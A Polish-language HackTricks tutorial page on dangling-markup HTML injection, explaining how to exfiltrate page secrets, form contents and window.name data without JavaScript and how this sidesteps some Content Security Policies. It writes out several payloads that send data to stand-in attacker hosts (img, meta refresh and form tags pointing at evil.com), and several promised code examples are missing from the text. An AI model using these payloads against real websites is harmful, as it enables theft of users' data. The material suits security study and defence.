Learn & practice AWS Hacking:<imgsrc="/.gitbook/assets/arte.png"alt=""data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<imgsrc="/.gitbook/assets/arte.png"alt=""data-size="line">\
Learn & practice GCP Hacking: <imgsrc="/.gitbook/assets/grte.png"alt=""data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<imgsrc="/.gitbook/assets/grte.png"alt=""data-size="line">](https://training.hacktricks.xyz/courses/grte)
* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
Ta technika może być używana do wyciągania informacji od użytkownika, gdy **znaleziono wstrzyknięcie HTML**. Jest to bardzo przydatne, jeśli **nie znajdziesz żadnego sposobu na wykorzystanie** [**XSS** ](../xss-cross-site-scripting/), ale możesz **wstrzyknąć kilka znaczników HTML**.\
Jest to również przydatne, jeśli jakiś **sekret jest zapisany w postaci czystego tekstu** w HTML i chcesz go **wyekstrahować** z klienta, lub jeśli chcesz wprowadzić w błąd w wykonaniu jakiegoś skryptu.
Kilka technik omówionych tutaj może być użytych do obejścia niektórych [**Content Security Policy**](../content-security-policy-csp-bypass/) poprzez wyekstrahowanie informacji w nieoczekiwany sposób (znaczniki html, CSS, znaczniki http-meta, formularze, base...).
Jeśli wstrzykniesz `<img src='http://evil.com/log.cgi?` podczas ładowania strony, ofiara wyśle ci cały kod między wstrzykniętym znacznikiem `img` a następnym cudzysłowem w kodzie. Jeśli sekret znajduje się w tym kawałku, ukradniesz go (możesz zrobić to samo używając podwójnego cudzysłowu, sprawdź, co może być bardziej interesujące do użycia).
Jeśli znacznik `img` jest zabroniony (na przykład z powodu CSP), możesz również użyć `<meta http-equiv="refresh" content="4; URL='http://evil.com/log.cgi?`
Możesz również wstawić tag `<base`. Wszystkie informacje będą wysyłane, dopóki cytat nie zostanie zamknięty, ale wymaga to interakcji ze strony użytkownika (użytkownik musi kliknąć w jakiś link, ponieważ tag base zmienił domenę wskazywaną przez link):
Ustaw nagłówek formularza: `<form action='http://evil.com/log_steal'>`, to nadpisze następny nagłówek formularza, a wszystkie dane z formularza zostaną wysłane do atakującego.
Używając wspomnianej wcześniej techniki do kradzieży formularzy (wstrzykiwanie nowego nagłówka formularza), możesz następnie wstrzyknąć nowe pole wejściowe:
i to pole wejściowe będzie zawierać całą zawartość między jego podwójnymi cudzysłowami a następnym podwójnym cudzysłowem w HTML. Atak ten łączy "_**Kradzież jawnych sekretów**_" z "_**Kradzieżą formularzy2**_".
`<noscript></noscript>` To tag, którego zawartość będzie interpretowana, jeśli przeglądarka nie obsługuje JavaScript (możesz włączyć/wyłączyć JavaScript w Chrome w [chrome://settings/content/javascript](chrome://settings/content/javascript)).
Sposobem na wyeksfiltrowanie zawartości strony internetowej od punktu wstrzyknięcia do dołu na kontrolowaną przez atakującego stronę będzie wstrzyknięcie tego:
Z tego [badania portswiggers](https://portswigger.net/research/evading-csp-with-dom-based-dangling-markup) możesz się dowiedzieć, że nawet z **najbardziej ograniczonych** środowisk **CSP** można nadal **ekstrahować dane** z pewną **interakcją użytkownika**. W tej okazji użyjemy ładunku:
Zauważ, że poprosisz **ofiarę** o **kliknięcie w link**, który **przekieruje** ją do **ładunku** kontrolowanego przez ciebie. Zauważ również, że atrybut **`target`** wewnątrz tagu **`base`** będzie zawierał **zawartość HTML** aż do następnego pojedynczego cudzysłowu.\
To spowoduje, że **wartość****`window.name`** po kliknięciu w link będzie zawierać całą tę **zawartość HTML**. Dlatego, ponieważ **kontrolujesz stronę**, na którą ofiara przechodzi, klikając link, możesz uzyskać dostęp do **`window.name`** i **ekstrahować** te dane:
Wstaw nowy tag z id wewnątrz HTML, który nadpisze następny i z wartością, która wpłynie na przebieg skryptu. W tym przykładzie wybierasz, z kim informacja będzie dzielona:
Dokument podrzędny ma możliwość przeglądania i modyfikowania właściwości `location` swojego rodzica, nawet w sytuacjach między źródłami. Umożliwia to osadzenie skryptu w **iframe**, który może przekierować klienta na dowolną stronę:
Iframe może być również nadużywany do wycieku wrażliwych informacji z innej strony **używając atrybutu nazwy iframe**. Dzieje się tak, ponieważ można stworzyć iframe, który iframe'uje siebie, nadużywając wstrzykiwania HTML, co sprawia, że **wrażliwe informacje pojawiają się wewnątrz atrybutu nazwy iframe**, a następnie uzyskać dostęp do tej nazwy z początkowego iframe i ją wyciekować.
For more info check [https://portswigger.net/research/bypassing-csp-with-dangling-iframes](https://portswigger.net/research/bypassing-csp-with-dangling-iframes)
Możesz użyć **`meta http-equiv`**, aby wykonać **kilka działań**, takich jak ustawienie ciasteczka: `<meta http-equiv="Set-Cookie" Content="SESSID=1">` lub wykonanie przekierowania (w tym przypadku po 5s): `<meta name="language" content="5;http://attacker.svg" HTTP-EQUIV="refresh" />`
Można to **uniknąć** za pomocą **CSP** dotyczącego **http-equiv** ( `Content-Security-Policy: default-src 'self';`, lub `Content-Security-Policy: http-equiv 'self';`)
Możesz znaleźć bardzo **interesujące badania** na temat podatnych na exploity luk w tagu \<portal [tutaj](https://research.securitum.com/security-analysis-of-portal-element/).\
W momencie pisania tego tekstu musisz włączyć tag portal w Chrome w `chrome://flags/#enable-portals`, inaczej nie będzie działać.
Nie wszystkie sposoby na wyciek łączności w HTML będą przydatne dla Dangling Markup, ale czasami mogą pomóc. Sprawdź je tutaj: [https://github.com/cure53/HTTPLeaks/blob/master/leak.html](https://github.com/cure53/HTTPLeaks/blob/master/leak.html)
To jest **mieszanka** między **dangling markup a XS-Leaks**. Z jednej strony luka pozwala na **wstrzyknięcie HTML** (ale nie JS) na stronę o **tej samej domenie**, którą będziemy atakować. Z drugiej strony nie będziemy **atakować** bezpośrednio strony, na którą możemy wstrzyknąć HTML, ale **inną stronę**.
XS-Search są ukierunkowane na **ekstrakcję informacji z różnych źródeł** poprzez nadużywanie **ataków bocznych**. Dlatego jest to inna technika niż Dangling Markup, jednak niektóre z technik nadużywają włączenia tagów HTML (z i bez wykonania JS), jak [**CSS Injection**](../xs-search/#css-injection) lub [**Lazy Load Images**](../xs-search/#image-lazy-loading)**.**
Learn & practice AWS Hacking:<imgsrc="/.gitbook/assets/arte.png"alt=""data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<imgsrc="/.gitbook/assets/arte.png"alt=""data-size="line">\
Learn & practice GCP Hacking: <imgsrc="/.gitbook/assets/grte.png"alt=""data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<imgsrc="/.gitbook/assets/grte.png"alt=""data-size="line">](https://training.hacktricks.xyz/courses/grte)
* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
